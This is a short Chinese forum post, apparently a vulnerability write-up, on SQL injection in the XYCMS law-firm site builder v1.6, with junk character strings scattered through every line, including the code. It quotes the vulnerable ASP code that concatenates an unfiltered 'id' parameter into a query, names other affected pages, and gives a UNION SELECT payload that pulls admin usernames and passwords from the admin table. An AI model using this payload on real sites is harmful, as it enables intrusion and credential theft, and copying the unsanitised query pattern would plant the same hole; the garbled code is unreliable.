前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似6 D' _( |1 R! B9 m
. M- z2 h) K2 Q- M( _6 h' D/ U
淫荡分割线6 }; a# x- Z) o* a+ r) |3 A
--------------------------------------------------------: R+ x, ]; r7 K0 Z
8 o. Z8 x6 N" J1 b7 z: G- [0 w4 k
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)% M T7 C# {% G( S8 F# {) D; |
源码地址:http://down.chinaz.com/soft/29233.htm
2 I& f1 o+ M' s, ~& D4 c ) ~5 i( y$ n. ?' w' m) A
漏洞文件:shownews.asp0 v, j- O( L* T& v9 l/ g
漏洞代码:7-13行5 P' h7 S8 ?2 k" r6 S. ]: e8 f
( f" u' D; b9 ^! P% X T- w
" c; c' T2 Y! Z) G' G
<% + j0 Y1 U8 }* j: t! W0 q
id=request.QueryString("id")2 w, V ]) S5 ^# q! W) K" ~, o
3 g4 f( w* m5 r$ L1 F$ p5 Hset snews=server.createobject("adodb.recordset")
# o7 g0 O, q# Qexec="select * from [news] where id="&id
4 A! o: \# e4 _' G; W+ }snews.open exec,conn,1,1 `3 Z, Z! K, ~- V
%>
$ ]* @. g0 r) p
$ H2 v. Z5 ?) @# Y9 k' ]
* k1 n1 ]: g2 L! D# L% ~什么过滤都没有 直造成注入
( O9 w" Y! x2 Q" n! G- J ! k# D: Y" d8 G
注入点:http://127.0.0.1:99/shownews.asp?id=xx# D. Q. Z2 P. H: I. _; n h
7 v. \& Q0 V6 j其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找& f3 @+ G, q8 J8 _
' k# {' ^6 c; E" |( c d
; J% Y, c; @3 {6 ~. k M3 A$ G, C: Nexp: union select 1,admin,password,4,5,7 from admin_user9 A4 |2 }9 V: e) G3 R: h, s
. t7 P8 t) q8 _
|